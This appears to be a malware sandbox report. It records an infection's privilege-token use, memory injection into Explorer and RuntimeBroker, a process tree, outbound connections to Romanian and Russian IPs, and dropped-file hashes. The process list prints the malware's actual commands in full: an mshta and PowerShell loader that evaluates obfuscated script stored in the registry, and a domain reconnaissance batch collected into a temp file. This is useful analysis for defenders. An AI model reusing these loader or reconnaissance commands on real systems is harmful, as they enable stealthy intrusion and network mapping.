Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2144 wrote to memory of 4732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3944 wrote to memory of 2160 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 2160 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2160 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5056 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5056 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2160 wrote to memory of 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2160 wrote to memory of 3472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3472 wrote to memory of 4788 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3472 wrote to memory of 4788 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2160 wrote to memory of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 wrote to memory of 4380 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4380 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4380 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4380 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4380 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1032 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4476 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1032 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2808 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2808 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2808 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1032 wrote to memory of 2328 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2328 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1224 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1032 wrote to memory of 3956 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3956 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 3248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3248 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9625.tmp" "c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp" "c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"

Network

Country Destination Domain Proto
US 52.109.8.21:443 tcp
US 67.26.209.254:80 tcp
US 67.26.209.254:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.220.29:80 tcp
US 204.79.197.200:443 tcp
GB 51.104.15.253:443 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
RO 37.120.206.71:80 37.120.206.71 tcp
US 204.79.197.203:80 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/4732-130-0x0000000000000000-mapping.dmp

memory/4732-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4732-136-0x0000000001470000-0x000000000147D000-memory.dmp

memory/2160-140-0x0000000000000000-mapping.dmp

memory/2160-141-0x0000019673A50000-0x0000019673A72000-memory.dmp

memory/2160-142-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

memory/5056-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline

MD5 0fd42ad9d1fcf2ecc458caeea500074d
SHA1 f6253dae00cd2c7e74d65c5bfb97df4d4afd0695
SHA256 b8d79550fe87187ab73bd3a2e17bcc4c9daea4c771359d86af0969a0068fe610
SHA512 161e119ec04a2ecc61fa153545586f39c78db2eabcc821953129abbe04790cc62dbae8a4a91d3ed84c799662d4836d0c50769b404fb43dc8ccdda2375495e135

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3696-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP

MD5 9ebd13fda96930a951c29c9803189680
SHA1 89a6da69cd5ca511ac20a150ef2849474513e647
SHA256 159f13f12ded6836e650aafe4ae2c8e4bb4c4e6e2d57d7aec584afa5830118b1
SHA512 9219145b9c53edd6ec84bb30cc9f7046e674355a0168f893337807d54fa6ebc5c53f7aedc4fab7cfc00ecc0179bfa0d33e778868791c8374e4cfc22f5bfa8a30

C:\Users\Admin\AppData\Local\Temp\RES9625.tmp

MD5 1ca03a1553f812f0678f5b98f50ea950
SHA1 c987674ceb9b3d027fb76bb53ed76afe05fe9f1b
SHA256 96d987b9edd809d181bbea3c6311a66bd9654a27dc1d4d35f05f40783aa446b3
SHA512 f132989e5f2eb20b61259544746eec2aad0aca903da18b3d0d646ef6dfc2c9f81b1b2a5031c50a2890b4b133bf03e19b494d816583fa255109862b1070851f48

C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.dll

MD5 e116c9d2033d807e7e238b4ef1b62441
SHA1 fd4a8a21145c7f14175ddf512a5ae51fdbd5fd5d
SHA256 a4685e10bc3da377f654b68bd161c8bd97be457743fb2b6dba04ec5d47df03e9
SHA512 a852a55a7701571fa02b653fda04a682a83de09dcfc781a66f96e5eb927b0d45e0b775e00162eafd5127e2459c6c5abd03b9d8f08bda2ae629691d7d24d71229

memory/3472-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline

MD5 9ec4f73902f40ee643aaa0697b535eff
SHA1 7bea1ea1aceab43bfa0345aabc5936818b2229a9
SHA256 146619eb310e9d43a5d2c03943336d8fc77eb2d786b02c68082aa6ccc04a4cc9
SHA512 5489f12f36cfe5a0c6af91a0b2083dada40debeb7e20745c241f8ed24986c7d483ce18c19821e9e89c73be4196de9f20d6881df6066edc9da50522dca72aeb80

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4788-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP

MD5 007da9aaa12d1c816666f84ca72ec4f1
SHA1 34d50bd86ddf66c225bcd5ba9c14ffef879f018d
SHA256 36fdaee98e5341b537ec8c09357bdd90dcec22bb81b4b7e5782d0d85b29b8380
SHA512 a73d6892ad244b0cd638cf1203f0a60f1136fdc5fb1a499ff35bf3170428ef2f6ee9fd5998a101e9122f7352ecfd22ac0f33cdb220dad34b6fac1399a8b0e5d7

C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp

MD5 9c1e57a168ffbe153f29f31014779080
SHA1 6388960cee0042722bde558269e7717a2a47651f
SHA256 3351f350fc93dbabef3b4ae0ef2a164b056c1d44a356cc4f5c3d851b7af609ae
SHA512 d0174befbb77cfcf4108362abeab7d116a1383a35cbfc183c41e057ec674f4831e79abf00f1bfcbefccca062a699d8df14a75ad64e990ba01aacf813dbe2fb5a

C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.dll

MD5 929399503519dcbb0b02be8c65c3b3ca
SHA1 3b017d0db8bd09320e0523dc51388fd87ba6cd4d
SHA256 adbb52f5a1c2eac7517deaf63d3a59e345e66c07537bd8cda39944ebcc9e0639
SHA512 6c5845741449c8ac32b3364cdca8e037b7a8092cc5ec956a3fd5c3983ab90b637e79ed99ec669abb7955d3084d9b7b4c28e273ef0a25bcdbc6cc493432a91d6d

memory/2160-157-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

memory/2160-158-0x0000019673DE0000-0x0000019673E1D000-memory.dmp

memory/3452-159-0x0000026C226C0000-0x0000026C22763000-memory.dmp

memory/3752-160-0x000001415F550000-0x000001415F5F3000-memory.dmp

memory/1032-161-0x00000000085F0000-0x0000000008693000-memory.dmp

memory/4380-162-0x0000000000000000-mapping.dmp

memory/4148-163-0x0000000000000000-mapping.dmp

memory/4916-164-0x0000000000000000-mapping.dmp

memory/4912-165-0x0000000000000000-mapping.dmp

memory/4916-166-0x00000000009D6B20-0x00000000009D6B24-memory.dmp

memory/4916-167-0x00000000011E0000-0x0000000001276000-memory.dmp

memory/3408-168-0x0000000000000000-mapping.dmp

memory/4544-169-0x000001746F810000-0x000001746F8B3000-memory.dmp

memory/4476-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1308-172-0x0000000000000000-mapping.dmp

memory/1032-173-0x000000000A5D0000-0x000000000A70B000-memory.dmp

memory/1032-177-0x000000000A710000-0x000000000A84A000-memory.dmp

memory/2092-181-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 7127823022c7a932f96be727f3ddc34a
SHA1 a29cdec64f59727a5eaedf30cb98f5444aa4249d
SHA256 2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f
SHA512 2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

memory/2808-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 7127823022c7a932f96be727f3ddc34a
SHA1 a29cdec64f59727a5eaedf30cb98f5444aa4249d
SHA256 2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f
SHA512 2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

memory/5116-185-0x0000000000000000-mapping.dmp

memory/1032-186-0x00000000085F0000-0x0000000008693000-memory.dmp

memory/2328-187-0x0000000000000000-mapping.dmp

memory/1224-188-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 a5f20a41aab2cab03bd597d49d14f77e
SHA1 49366784d753ad7071d4a45682499d395fca5f25
SHA256 18bc37c219505ce44a8b8c77941eb2f901da13de2e4a7741b8efcf67e25bb121
SHA512 fa382a6f8a55a7553c112d243e9178f348b397a7af6dc5a66213641554dd28ee7074f4015615bcf9fd9f82ba7906b7fff953ab91de05e9d9368b7d4393a807b1

memory/1160-190-0x0000000000000000-mapping.dmp

memory/3956-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b19ff771046a3c130ed5b585522e87f7
SHA1 dc7fbb6af7033c894904b51f855862723cdaa161
SHA256 73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b
SHA512 5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

memory/3248-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b19ff771046a3c130ed5b585522e87f7
SHA1 dc7fbb6af7033c894904b51f855862723cdaa161
SHA256 73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b
SHA512 5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

memory/2860-195-0x0000000000000000-mapping.dmp

memory/3700-196-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6d6a8b3f318fd3d8cef74f5a606d175b
SHA1 bbf142b78df2ef8bae740e28e29499f98f443144
SHA256 6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add
SHA512 3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

